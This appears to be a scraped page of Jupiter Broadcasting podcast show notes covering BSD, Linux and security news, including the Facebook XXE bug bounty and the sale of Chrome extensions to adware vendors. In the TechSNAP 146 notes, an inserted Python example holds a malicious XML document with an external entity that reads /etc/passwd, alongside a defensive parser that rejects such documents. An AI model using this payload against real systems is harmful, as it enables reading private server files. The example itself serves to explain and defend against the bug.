Shellshock BASH Vulnerability Tester

You can use this website to test if your system is vulnerable, and also learn how to patch the vulnerability so you are no longer at risk for attack.

Weekly Spotlight

RockStor: Store Smartly: Free Advanced File Storage

✔ Installs on 64-bit commodity hardware or virtual machine
✔ Built on top of Enterprise Linux operating system
✔ Supports NAS sharing protocols including Samba/CIFS, NFS and SFTP
✔ Efficient storage management functionality with web-ui or CLI
✔ Extend functionality with plugins


— NEWS —

GNOME 3.14 Released, See What`s New

After six months of development, GNOME 3.14 was released today and it includes quite a few interesting changes such as multi-touch gestures for both the system and applications, re-worked default theme, new animations as well as various enhancements for the core GNOME applications.

In a nutshell I like Gnome 3.14 a lot. It’s a really nice release. Though I am a hard core Plasma user, I see myself spending some time with Gnome, enjoying things like online integration, easy-to-set-up Evolution and many more features which I can’t find in KDE’s Plasma. That said, both are my favorite. They both excel in their focus areas. If you have not tried Gnome yet, do give it a try.


Apart from Touch support in Shell there is also support for GNOME apps and in fact some GNOME apps they do use gestures!

The Wayland changes for GTK+ 3.14 include support for the recently released Wayland 1.6, touch input is now supported, working drag-and-drop support, and support for the GNOME classic mode.

Touchscreens are no longer just for tablets and phones. Touchscreen laptop computers and desktops are becoming the norm, if not more common, in the computer market. Much of this has been spurred-on by Microsoft and Windows 8, whose “Modern” interface is about as touchscreen-friendly as you can get. In fact, it is what is driving the laptop market to include capacitive touchscreens.

The nosh package

It should also be suitable for filling the gap caused by the
systemd tool not being portable outwith the Linux kernel since it
is known to work on proper BSD and on Debian Linux, and therefore
should work on Debian kFreeBSD.

Ubuntu 14.10 Beta Downloads Now Available

There’s not even a new default desktop wallpaper.

Feature Freeze is the point past which no new features, packages or APIs are introduced, with emphasis placed on polish and bug fixing to ensure as stable an experience as possible. Feature Freeze for Ubuntu 14.10 and its flavors came into effect on August 21 — a month prior to the release of GNOME 3.14 Stable.

It’s this tight timeframe that conspires against the Ubuntu GNOME team, making it impossible for them to include latest GNOME stack. If you were one of those who hoped to find GNOME 3.12 in Ubuntu 14.04 LTS, you’ll be familiar with the impact this has.


A series of maintained PPAs — Stable, Staging, and Next — provide backports of newer GNOME releases to Ubuntu, allowing you to optionally roll with (potentially untested) newer software should you want to.

Tech Talk Today | A Daily Tech News Show with a Linux Perspective


— FEEDBACK —

— CHRIS’ STASH —

Hang in our chat room:

irc.geekshed.net #jupiterbroadcasting

— MATT’S STASH —

Find us on Google+

Find us on Twitter

Follow the network on Facebook

Catch the show LIVE Sunday 10am Pacific / 1pm Eastern / 6pm UTC:


A BUG’s Life | BSD Now 38 https://original.jupiterbroadcasting.net/57997/a-bugs-life-bsd-now-38/ Thu, 22 May 2014 10:22:23 +0000 https://original.jupiterbroadcasting.net/?p=57997 We’re back from BSDCan! This week on the show we’ll be chatting with Brian Callahan and Aaron Bieber about forming a local BSD users group. We’ll get to hear their experiences of running one and maybe encourage some of you to start your own! After that, we’ve got a tutorial on the basics of NetBSD’s […]

The post A BUG's Life | BSD Now 38 first appeared on Jupiter Broadcasting.


We’re back from BSDCan! This week on the show we’ll be chatting with Brian Callahan and Aaron Bieber about forming a local BSD users group. We’ll get to hear their experiences of running one and maybe encourage some of you to start your own!

After that, we’ve got a tutorial on the basics of NetBSD’s package manager, pkgsrc. Answers to your emails and the latest headlines, on BSD Now – the place to B.. SD.

Thanks to:


iXsystems


Tarsnap

Direct Download:

Video | HD Video | MP3 Audio | OGG Audio | Torrent | YouTube

RSS Feeds:

MP3 Feed | OGG Feed | iTunes Feed | Video Feed | HD Vid Feed | HD Torrent Feed

– Show Notes: –

Headlines

FreeBSD 11 goals and discussion

  • Something that actually happened at BSDCan this year…
  • During the FreeBSD devsummit, there was some discussion about what changes will be made in 11.0-RELEASE
  • Slides from Dev Summit
  • Some of MWL’s notes include: the test suite will be merged to 10-STABLE, more work on the MIPS platforms, LLDB getting more attention, UEFI boot and install support
  • A large list of possibilities was also included and open for discussion, including AES-GCM in IPSEC, ASLR, OpenMP, ICC, in-place kernel upgrades, Capsicum improvements, TCP performance improvements and A LOT more
  • There’s also some notes from the devsummit virtualization session, mostly talking about bhyve
  • Lastly, he also provides some notes about ports and packages and where they’re going

An SSH honeypot with OpenBSD and Kippo

  • Everyone loves messing with script kiddies, right?
  • This blog post introduces Kippo, an SSH honeypot tool, and how to use it in combination with OpenBSD
  • It includes a step by step (or rather, command by command) guide and some tips for running a honeypot securely
  • You can use this to get new 0day exploits or find weaknesses in your systems
  • OpenBSD makes a great companion for security testing tools like this with all its exploit mitigation techniques that protect all running applications

NetBSD foundation financial report

  • The NetBSD foundation has posted their 2013 financial report
  • It’s a very “no nonsense” page, pretty much only the hard numbers
  • In 2013, they got $26,000 of income in donations
  • The rest of the page shows all the details, how they spent it on hardware, consulting, conference fees, legal costs and everything else
  • Be sure to donate to whichever BSDs you like and use!

Building a fully-encrypted NAS with OpenBSD

  • Usually the popular choice for a NAS system is FreeNAS, or plain FreeBSD if you know what you’re doing
  • This article takes a look at the OpenBSD side and explains how to build a NAS with security in mind
  • The NAS will be fully encrypted, no separate /boot partition like FreeBSD and FreeNAS require – this means the kernel itself is even protected
  • The obvious trade-off is the lack of ZFS support for storage, but this is an interesting idea that would fit most people’s needs too
  • There’s also a bit of background information on NAS systems in general, some NAS-specific security tips and even some nice graphs and pictures of the hardware – fantastic write up!

Interview – Brian Callahan & Aaron Bieber – admin@lists.nycbug.org & admin@cobug.org

Forming a local BSD Users Group


Tutorial

The basics of pkgsrc


News Roundup

FreeBSD periodic mails vs. monitoring

  • If you’ve ever been an admin for a lot of FreeBSD boxes, you’ve probably noticed that you get a lot of email
  • This page tells about all the different alert emails, cron emails and other reports you might end up getting, as well as how to manage them
  • From bad SSH logins to Zabbix alerts, it all adds up quickly
  • It highlights the periodic.conf file and FreeBSD’s periodic daemon, as well as some third party monitoring tools you can use to keep track of your servers

Doing cool stuff with OpenBSD routing domains

  • A blog post from our viewer and regular emailer, Kjell-Aleksander!
  • He manages some internally-routed IP ranges at his work, but didn’t want to have equipment for each separate project
  • This is where OpenBSD routing domains and pf come in to save the day
  • The blog post goes through the process with all the network details you could ever dream of
  • He even named his networking equipment… after us

LibreSSL, the good and the bad

  • We’re all probably familiar with OpenBSD’s fork of OpenSSL at this point
  • However, “for those of you that don’t know it, OpenSSL is at the same time the best and most popular SSL/TLS library available, and utter junk”
  • This article talks about some of the cryptographic development challenges involved with maintaining such a massive project
  • You need cryptographers, software engineers, software optimization specialists – there are a lot of roles that need to be filled
  • It also mentions some OpenSSL alternatives and recent LibreSSL progress, as well as some downsides to the fork – the main one being their aim for backwards compatibility

PCBSD weekly digest

  • Lots going on in PCBSD land this week, AppCafe has been redesigned
  • The PBI system is being replaced with pkgng, PBIs will be automatically converted once you update
  • In the more recent post, there\’s some further explanation of the PBI system and the reason for the transition
  • It\’s got lots of details on the different ways to install software, so hopefully it will clear up any possible confusion
  • Working on adding support for FDE with GELI using GRUB for 10.0.2
  • Any devs who can grok the GRUB geli code are welcome to contact Kris

Feedback/Questions


  • All the tutorials are posted in their entirety at bsdnow.tv
  • Send questions, comments, show ideas/topics, or stories you want mentioned on the show to feedback@bsdnow.tv
  • If you’ve got something cool to talk about and want to come on for an interview, shoot us an email
  • Michael Lucas will be giving a live presentation next Tuesday, “Beyond Security: Getting to Know OpenBSD’s Real Purpose” so be sure to catch that
  • Preorders for the book of PF’s third edition are up
  • We got a picture of a bunch of old FreeBSD CDs
  • Watch live Wednesdays at 2:00PM Eastern (18:00 UTC)


Port Authority | BSD Now 26 https://original.jupiterbroadcasting.net/52452/port-authority-bsd-now-26/ Thu, 27 Feb 2014 21:34:25 +0000 https://original.jupiterbroadcasting.net/?p=52452 On today’s show we have an interview with Joe Marcus Clark, one of the original portmgr members in FreeBSD, and one of the key GNOME porters. Keeping along with that topic, we have a FreeBSD ports tutorial for you as well. The latest news and answers to your BSD questions, right here on BSD Now […]

The post Port Authority | BSD Now 26 first appeared on Jupiter Broadcasting.


On today’s show we have an interview with Joe Marcus Clark, one of the original portmgr members in FreeBSD, and one of the key GNOME porters. Keeping along with that topic, we have a FreeBSD ports tutorial for you as well. The latest news and answers to your BSD questions, right here on BSD Now – the place to B.. SD.

Thanks to:


iXsystems

Direct Download:

Video | HD Video | MP3 Audio | OGG Audio | Torrent | YouTube

RSS Feeds:

MP3 Feed | OGG Feed | iTunes Feed | Video Feed | HD Vid Feed | HD Torrent Feed

– Show Notes: –

Headlines

Tailoring OpenBSD for an old, strange computer

  • The author of this article had an OmniBook 800CT, which comes with a pop-out mouse, black and white display, 32MB of RAM and a 133MHz CPU
  • Obviously he had to install some kind of BSD on it!
  • This post goes through all his efforts of trimming down OpenBSD to work on such a limited device
  • He goes through the trial and error of “compile, break it, rebuild, try again”
  • After cutting a lot out from the kernel, saving a precious megabyte here and there, he eventually gets it working

pkgsrcCon and BSDCan

  • pkgsrccon is “a technical conference for people working on the NetBSD Packages Collection, focusing on existing technologies, research projects, and works-in-progress in pkgsrc infrastructure”
  • This year it will be on June 21st and 22nd
  • The schedule is still being worked out, so if you want to give a talk, submit it
  • BSDCan’s schedule was also announced
  • We’ll be having presentations about ARM on NetBSD and FreeBSD, PF on OpenBSD, Capsicum and casperd, ASLR in FreeBSD, more about migrating from Linux to BSD, FreeNAS stuff and much more
  • Kris\’ presentation was accepted!
  • Tons of topics, look forward to the recorded versions of all of them hopefully!

Two factor auth with pushover

  • A new write-up from our friend Ted Unangst
  • Pushover is “a web hook to smartphone push notification gateway” – you send a POST to a web server and it sends a code to your phone
  • His post goes through the steps of editing your login.conf and setting it all up to work
  • Now you can get a two factor authenticated login for ssh!

The status of GNOME 3 on BSD

  • It’s no secret that the GNOME team is a Linux-obsessed bunch, almost to the point of being hostile towards other operating systems
  • OpenBSD keeps their GNOME 3 ports up to date very well, and Antoine Jacoutot writes about his work on that and how easy it is to use
  • This post goes through the process of how simple it is to get GNOME 3 set up on OpenBSD and even includes a screencast
  • A few recent posts from some GNOME developers show that they’re finally working with the BSD guys to improve portability
  • The FreeBSD and OpenBSD teams are working together to bring the latest GNOME to all of us – it’s a beautiful thing
  • This goes right along with our interview today!

This episode was brought to you by

iXsystems


Interview – Joe Marcus Clark – marcus@freebsd.org

The life and daily activities of portmgr, GNOME 3, Tinderbox, portlint, various topics


Tutorial

The FreeBSD Ports Collection


News Roundup

DragonflyBSD 3.8 goals and 3.6.1 release

  • The Dragonfly team is thinking about what should be in version 3.8
  • On their bug tracker, it lists some of the things they’d like to get done before then
  • In the meantime, 3.6.1 was released with lots of bugfixes

NYCBSDCon 2014 wrap-up piece

  • We’ve got a nice wrap-up titled “NYCBSDCon 2014 Heats Up a Cold Winter Weekend”
  • The author also interviews GNN about the conference
  • There’s even a little “beginner introduction” to BSD segment
  • Includes a mention of the recently-launched journal and lots of pictures from the event

FreeBSD and Linux, a comparative analysis

  • GNN in yet another story – he gave a presentation at the NYLUG about the differences between FreeBSD and Linux
  • He mentions the history of BSD, the patch set and 386BSD, the lawsuit, philosophy and license differences, a complete system vs “distros,” development models, BSD-only features and technologies, how to become a committer, overall comparisons, different hats and roles, the different BSDs and their goals and actual code differences
  • Serves as a good introduction you can show your Linux friends

PCBSD CFT and weekly digest

  • Upgrade tools have gotten a major rewrite
  • You have to help test it, there is no choice! Read more here
  • How dare Kris be “unimpressed with” freebsd-update and pkgng!?
  • Various updates and fixes

Feedback/Questions

  • Jeffrey writes in: https://slexy.org/view/s213KxUdVj
  • Shane writes in: https://slexy.org/view/s20lwkjLVK
  • Ferdinand writes in: https://slexy.org/view/s21DqJs77g
  • Curtis writes in: https://slexy.org/view/s20eXKEqJc
  • Clint writes in: https://slexy.org/view/s21XMVFuVu
  • Peter writes in: https://slexy.org/view/s20Xk05MHe

  • All the tutorials are posted in their entirety at bsdnow.tv
  • Send questions, comments, show ideas/topics, or stories you want mentioned on the show to feedback@bsdnow.tv
  • Our email backlog is totally caught up now, so email us all your questions!
  • Watch live Wednesdays at 2:00PM Eastern (19:00 UTC)


Tarnished Chrome | TechSNAP 146 https://original.jupiterbroadcasting.net/50227/tarnished-chrome-techsnap-146/ Thu, 23 Jan 2014 17:34:34 +0000 https://original.jupiterbroadcasting.net/?p=50227 Why Facebook just paid out a $33k bug bounty, and Chrome's bad security week.

The post Tarnished Chrome | TechSNAP 146 first appeared on Jupiter Broadcasting.


Facebook just paid out their biggest bug bounty yet, we’ll tell you about the flaw that was so major it warranted a $33k bounty. Plus it’s been a bad week for Chrome security…

Then it’s a big batch of your questions, our answers, and much much more!

Thanks to:


GoDaddy


Ting

Direct Download:

HD Video | Mobile Video | MP3 Audio | Ogg Audio | YouTube | HD Torrent | Mobile Torrent

RSS Feeds:

HD Video Feed | Mobile Video Feed | MP3 Audio Feed | Ogg Audio Feed | iTunes Feeds | Torrent Feed

— Show Notes: —

Facebook pays out biggest bug bounty ever, $33,500 after researcher gets ‘keys to the kingdom’

  • Reginaldo Silva, a Brazilian security researcher, found a remote code execution flaw in Facebook and was able to perform various actions, including copying the /etc/passwd file (giving him a list of the users that exist on the system), and could have changed the URL for the Google OpenID provider in order to execute MitM attacks on users logging in to Facebook using their Gmail accounts
  • The original flaw was found in September 2012, when the researcher discovered an XXE (XML External Entity) bug in a Drupal blog’s OpenID provider
  • After finding the flaw in OpenID, he tried the attack successfully against StackExchange
  • Later he also tried it against Google, while it worked, he was not able to read any files or make any network connections. For this he received his first bug bounty, $500 from Google
  • During the original investigation, he could not find a valid Facebook OpenID endpoint
  • Some time later, while investigating the Facebook password reset system, he discovered they still used OpenID for Gmail users to reset their passwords
  • Using the newly discovered endpoint, he still was not able to launch his attack, because Facebook only communicated with Google, and for the attack to work he needed to communicate with his malicious OpenID provider
  • After more reading of the OpenID spec, he found what he was looking for and was able to cause Facebook to contact his server, parse his malicious XML and cause Facebook’s servers to run code of his choosing
  • From this he was able to get a copy of the /etc/passwd from the server
  • Researcher’s Blog Post
  • Facebook Security Team Blog Post
  • Facebook Extends Bug Bounty Program
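An added example (not the researcher’s payload or Facebook’s code) of the XXE bug class described above. The OpenID discovery document below is constructed, and so is the malicious variant carrying a SYSTEM entity that points at /etc/passwd. The parse_xml_untrusted function refuses any DTD before handing the bytes to the standard-library parser, and stdlib_expands_entities shows why that matters: Python’s xml.etree expands DTD-declared entities as written, so whoever controls the document’s DTD controls what lands in the parsed tree. The function and class names are this example’s own.

```python
import re
import xml.etree.ElementTree as ET

# Constructed documents. A relying party fetches something like the first one
# from the identity provider it was told to talk to; the second is what an
# attacker-controlled "provider" could serve instead.
BENIGN_OPENID_XRDS = b"""<?xml version="1.0" encoding="UTF-8"?>
<xrds:XRDS xmlns:xrds="xri://$xrds" xmlns="xri://$xrd*($v*2.0)">
  <XRD>
    <Service priority="0">
      <Type>http://specs.openid.net/auth/2.0/server</Type>
      <URI>https://idp.example.test/openid</URI>
    </Service>
  </XRD>
</xrds:XRDS>"""

MALICIOUS_XRDS = b"""<?xml version="1.0"?>
<!DOCTYPE xrds [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<xrds:XRDS xmlns:xrds="xri://$xrds"><XRD><Service><URI>&xxe;</URI></Service></XRD></xrds:XRDS>"""

# Same mechanism, internal entity only: enough to show the parser expands whatever the DTD says.
INTERNAL_ENTITY_DOC = b'<!DOCTYPE r [<!ENTITY greet "expanded">]><r>&greet;</r>'

# Fail-closed pre-check: entities can only be declared inside a DOCTYPE, and a
# DOCTYPE has no legitimate use in an XRDS/OpenID document.
_DTD_RE = re.compile(rb"<!(DOCTYPE|ENTITY)\b", re.IGNORECASE)


class UnsafeXmlError(ValueError):
    """Raised when a document from an untrusted party carries a DTD."""


def parse_xml_untrusted(data: bytes):
    """Parse XML fetched from a party the caller does not control, refusing any DTD.
    No DTD means no entity declarations, so neither SYSTEM entities (XXE) nor
    entity-expansion bombs can be expressed."""
    if _DTD_RE.search(data):
        raise UnsafeXmlError("DTD/entity declarations are not accepted")
    return ET.fromstring(data)


def openid_endpoint(data: bytes):
    """Return the first <URI> text from a discovery document, or None."""
    root = parse_xml_untrusted(data)
    for el in root.iter():
        if el.tag == "URI" or el.tag.endswith("}URI"):
            return (el.text or "").strip()
    return None


def is_rejected(data: bytes) -> bool:
    try:
        parse_xml_untrusted(data)
    except UnsafeXmlError:
        return True
    return False


def stdlib_expands_entities() -> str:
    """The unguarded parse: the entity declared in the DTD is substituted into
    the tree, which is the behaviour XXE builds on."""
    return ET.fromstring(INTERNAL_ENTITY_DOC).text


if __name__ == "__main__":
    print("benign endpoint:", openid_endpoint(BENIGN_OPENID_XRDS))
    print("malicious rejected:", is_rejected(MALICIOUS_XRDS))
    print("unguarded parser expands DTD entity to:", stdlib_expands_entities())
```

A byte-level DOCTYPE check is crude (it would also trip on the string inside a comment) but it fails closed, which is the right direction for data a remote identity provider hands you; a parser with a real "no DTD" switch is the cleaner alternative where one is available.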

Security companies remove information about target breach from the Internet

  • One we had previously covered:
  • “On Dec. 18, a malicious software sample was submitted to ThreatExpert.com, a Symantec-owned service. But the public report the service generated vanished. “
  • However, as is often the case with the internet, someone (Krebs ftw) had a copy of the report and posted it
  • “iSight Partners, a Dallas-based cybersecurity company that is working with the U.S. Secret Service, published a series of questions and answers on its website related to the attacks on point-of-sale devices at U.S retailers. That too vanished on Thursday.”
  • “Intel-owned McAfee redacted on Tuesday a blog post from last week that contained technical detail similar to the ThreatExpert.com report”
  • When queried, a Symantec spokeswoman said “we took the initiative to remove it because we didn’t want the information to compromise the ongoing investigation.”
  • Alex Holden, founder of Hold Security, who worked with Brian Krebs on the Adobe breach, said it was the right move for Symantec to pull the report, as attackers might have been able to use the information to compromise other point-of-sale devices at other retailers
  • “I was surprised that this information was posted on the Internet in the first place,” Holden said. “Besides having a Target machine’s name and its IP address, system structure and drive mapping, it discloses a very vital set of credentials setup specifically for exploitation of the device.”
  • As many as six other U.S. companies are believed to be victims of point-of-sale related attacks, where malware intercepts unencrypted card details. So far, only Target and high-end retailer Neiman Marcus have acknowledged the attacks.

Adware vendors buy Chrome Extensions to send ad- and malware-filled updates

  • While Chrome itself is updated automatically by Google, that update process also includes Chrome’s extensions, which are updated by the extension owners.
  • This means that it’s up to the user to decide if the owner of an extension is trustworthy or not, since you are basically giving them permission to push new code out to your browser whenever they feel like it.
  • Ownership of a Chrome extension can be transferred to another party, and users are never informed when an ownership change happens.
  • Malware and adware vendors have caught wind of this and have started showing up at the doors of extension authors, looking to buy their extensions.
  • Once the deal is done and the ownership of the extension is transferred, the new owners can issue an ad-filled update over Chrome’s update service, which sends the adware out to every user of that extension.
  • A first-hand account of this, which was first spotted by OMGChrome, was given by Amit Agarwal, developer of the “Add to Feedly” extension.
  • One morning, the extension author got an e-mail offering “4 figures” for the sale of his Chrome extension. The extension was only about an hour’s worth of work, so Agarwal agreed to the deal, the money was sent over PayPal, and he transferred ownership of the extension to another Google account.
  • A month later, the new extension owners released their first (and so far only) update, which injected adware on all webpages and started redirecting links.
  • This isn’t a one-time event, either. About a month ago, I had a very simple Chrome extension called “Tweet This Page” suddenly transform into an ad-injecting machine and start hijacking Google searches.
  • Google has stated that Chrome’s extension policy is due to change in June 2014. The new policy will require extensions to serve a single purpose.
  • Chromium Blog: Keeping Chrome Extensions Simple

Feedback:


Round Up:


The post Tarnished Chrome | TechSNAP 146 first appeared on Jupiter Broadcasting.

52 Commits | CR 52 https://original.jupiterbroadcasting.net/38161/52-commits-cr-52/ Mon, 03 Jun 2013 10:54:12 +0000 https://original.jupiterbroadcasting.net/?p=38161 Mike and Chris chat about Firefox OS’s big boost, and how it's very interesting for HTML5 developers. Then debate if Canonical is surrendering the desktop war.

The post 52 Commits | CR 52 first appeared on Jupiter Broadcasting.


Mike and Chris chat about Firefox OS’s big boost, and how things could be starting to get very interesting for mobile and HTML5 developers. Then debate if Canonical is surrendering the desktop war.

Plus Mike reviews his new HTC One, your emails, and more!

Thanks to:

Use our code coder249 to get a .COM for $2.49.


Direct Download:

MP3 Audio | OGG Audio | Video | Torrent | YouTube

RSS Feeds:

MP3 Feed | OGG Feed | Video Feed | Torrent Feed | iTunes Audio | iTunes Video

Feedback:

HTC ONE: The Mike Review

The HTC One is the best Android smartphone in the world — period. It combines some of the best materials with the most incredible screen I’ve seen, and is the fastest and most responsive Android phone I have used.

I can boil the preceding 3,000 or so words into a few brief sentiments for you to chew on: the HTC One is easily the best device that the company has ever crafted, and it’s perhaps the single nicest Android phone I’ve ever used. Despite some minor faults, I haven’t so much as picked up any of the other Android smartphones scattered around my office during my time with the One unless I absolutely had to. It’s really that good.

The phone — like all phones — does have its shortcomings. There’s no way to expand the storage, which HTC attempts to address by shipping the base model with 32 gigabytes of memory instead of the more standard 16 gigabytes. There’s also no way to replace the battery. The power button on the top left of the phone is set at a bit of a downward angle that forces your finger to curl up and over the top edge of the phone in order to access it, which makes waking the phone up a tad cumbersome at times. And people with small hands may still find the 4.7-in.-screened handset too large to use comfortably.

Hoopla:

At a press conference earlier today in Taipei (2pm local time on 6/3/2013), the Foxconn Technology Group announced their support for Firefox OS, Mozilla’s open Web mobile operating system. The partnership includes collaboration on the use of the Firefox OS on Foxconn devices to create new, integrated offerings. For the complete press release, see Mozilla’s press center.

As you may have already heard, the former company has signed on to become the 19th member of the latter’s Firefox OS alliance, and it’s already working on at least five devices.

Today, Shuttleworth has declared the bug “closed,” but the bug wasn’t fixed as a result of Ubuntu’s popularity. It was fixed by the rise of iOS and Android. As for Ubuntu, Shuttleworth now says, “it’s better for us to focus our intent on excellence in our own right rather than our impact on someone else’s product.”

Tool of the Week

Book of the Week

The Arch Way | AAS s27e03 https://original.jupiterbroadcasting.net/38086/the-arch-way-aas-s27e03/ Sun, 02 Jun 2013 15:37:10 +0000 https://original.jupiterbroadcasting.net/?p=38086 We wrap up our week with the Arch challenge! We report our successes, our failures, and how the dynamics of the Arch community can be a bit of a challenge.

The post The Arch Way | AAS s27e03 first appeared on Jupiter Broadcasting.


We wrap up our week with the Arch challenge! We report our successes, our failures, and how the dynamics of the Arch community can be a bit of a challenge for new users.

Plus getting the assistance you need when tackling a challenge in Arch, the upcoming features in Gnome 3.10, Mark Shuttleworth closing Ubuntu’s #1 bug, and we give away some Steam games!

All this week on, The Linux Action Show!

Thanks to:

Use our code linux249 to score .COM for just $2.49!

35% off your ENTIRE first order just use our code 35off2 until the end of the month!


Visit las.ting.com to save $25 off your device or service credits.


Download:

HD Video | Mobile Video | WebM Torrent | MP3 Audio | Ogg Audio | YouTube | HD Torrent

RSS Feeds:

HD Video Feed | Large Video Feed | Mobile Video Feed | MP3 Feed | Ogg Feed | iTunes Feeds | Torrent Feed

Support the Show:

— Show Notes: —

Arch Challenge Results:


System76

Brought to you by: System76


– Picks –

Runs Linux:

Android Pick:

Desktop App Pick:

Search our past picks:

This tumblr contains the Linux app picks from the Linux Action Show. Both the Linux apps and the Android apps

Git your hands all over our STUFF:


— NEWS —

— /etc: Let’s Play —


Untangle

Brought to you by: Untangle

– Feedback: –

— Chris’ Stash —

Hang in our chat room:

irc.geekshed.net #jupiterbroadcasting

— What’s Matt Doin? —

— Find us on Google+ —
— Find us on Twitter —
— Follow the network on Facebook: —
— Catch the show LIVE Sunday 10am Pacific / 1pm Eastern / 6pm UTC: —

BSDCan 2013 Recap | TechSNAP 111 https://original.jupiterbroadcasting.net/37661/bsdcan-2013-recap-techsnap-111/ Thu, 23 May 2013 16:42:54 +0000 https://original.jupiterbroadcasting.net/?p=37661 Researchers find exploits for popular game engines, plus TerraCom epic privacy breach, a recap from BSDcan 2013

The post BSDCan 2013 Recap | TechSNAP 111 first appeared on Jupiter Broadcasting.


Researchers find exploits for popular game engines, putting both clients and servers at risk; we’ll share the details.

Plus TerraCom epic privacy breach, a recap from BSDcan 2013, your questions our answers, and much much more!

On this week’s TechSNAP!

Thanks to:

Use our code tech249 to score .COM for $2.49!

32% off your ENTIRE first order just use our code go32off3 until the end of the month!


Direct Download:

HD Video | Mobile Video | MP3 Audio | Ogg Audio | YouTube | HD Torrent | Mobile Torrent

RSS Feeds:

HD Video Feed | Mobile Video Feed | MP3 Audio Feed | Ogg Audio Feed | iTunes Feeds | Torrent Feed


Support the Show:


Show Notes:

Get TechSNAP on your Android:

Browser Affiliate Extension: